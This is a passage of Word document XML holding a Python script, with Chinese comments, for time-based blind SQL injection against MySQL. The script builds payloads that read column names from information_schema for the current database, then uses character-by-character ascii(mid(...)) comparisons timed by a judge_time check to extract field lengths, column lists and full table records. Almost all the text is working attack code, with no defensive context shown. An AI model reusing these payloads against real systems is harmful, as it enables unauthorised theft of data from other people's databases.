    <w:p w14:paraId="402B3365" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="545F8CE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column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end</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AD19E9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获取长度</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC7EEF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length = 1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002836C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L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0000):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C951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payload =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 + \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434C190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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>f"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>length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lumn_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>information_schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> " \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5967E2A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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>f"where</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>DATABASE(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>) AND " \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016DF4D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f"""table_name=0x{str(binascii.b2a_hex(table_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>name.encode</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(r"utf-8"))).split("'")[1]}))={L}""" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7257628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+ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>payload_end</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1D6ACCC1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    log(f'\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>rGetting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> length of all fields from {</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>{L}')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253DB7B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r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>judge_time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(payload):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBCE84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f'\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>nlength</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> of all fields of {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}: {L}')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2926CF1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length = L</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E4930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break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE876C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L == 999:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5021ECA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f'\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>rCannot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> get length of all fields of {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}: {L}')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4081021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303AC989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获取值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A524CA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columns_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2254AD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25812B31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    # log(f'\r</w:t>
      </w:r>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>正在</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>获取第</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>个</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>值：</w:t>
      </w:r>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>columns_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>}')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6762B67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ascii_num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39, 123):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FFC26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payload =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 + \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED115C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f"(select ascii(mid(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lumn_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>),{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd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},1)) from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>information_schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> " \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363E180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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>f"where</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>DATABASE(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) AND 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=" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072D04E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f"""0x{str(binascii.b2a_hex(table_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>name.encode</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(r"utf-8"))).split("'")[1]})={ascii_num}""" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6521365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+ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>payload_end</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="462F1C3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judge_time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(payload):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185B78E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columns_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> += chr(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ascii_num</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0839EB7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columns_list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columns_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>name.split</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(',')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310C15B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spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>f'Attaining</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> of all fields from {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} completed')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AAF31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r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>columns_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="343D7840" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="353B0B7D" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="353484E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column_list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end</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADAE76F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获取记录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AED678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columns_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A9E7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spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>column_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111AA06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columns_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> += f</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>",{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4587804E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获取长度</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A52183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length = 10000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7829C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L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0000):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE8C1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payload =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 + \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3259897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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>f"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>length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ncat_ws</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(':'{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>columns_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>})) from {</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>}))={L}""" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFA9E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+ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>payload_end</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3C94D94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f'\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>rGetting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> length of all records from {</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>}: {L}')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3561750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r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>judge_time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(payload):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D46D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f'\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>nCurrent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> length of all fields from {</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>}: {L}')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E70484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length = L</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4491BAC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break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B6A50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L == 9999:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE6D83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f'\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>rCannot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> get length of all fields from {</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>}: {L}')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350260F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374DF42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[]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449CB75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data_str</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B325467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获取值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DCDE6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084D7109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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        # print(f'\r</w:t>
      </w:r>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>正在</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>获取第</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>个</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>值：</w:t>
      </w:r>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>data_str</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>}', end='')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF628A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ascii_num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39, 123):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07828C5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payload =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 + \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364E171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f"(select ascii(mid(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ncat_ws</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(':'{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>columns_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>})</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>),{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>},1)) from {</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>})" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD84CA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f"={</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ascii_num</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">} " + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>payload_end</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4102971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judge_time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(payload):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6A115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data_str</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> += chr(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ascii_num</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F28DA60" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D4E7A8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data_list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data_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>str.split</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(',')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C05FB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spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>data_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D24F04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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>data.append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i.split</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(':'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D22DD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f'\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>nRetrieving</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> of data from {</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>} completed')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D901F4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data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0C8D87" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="659E70B9" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
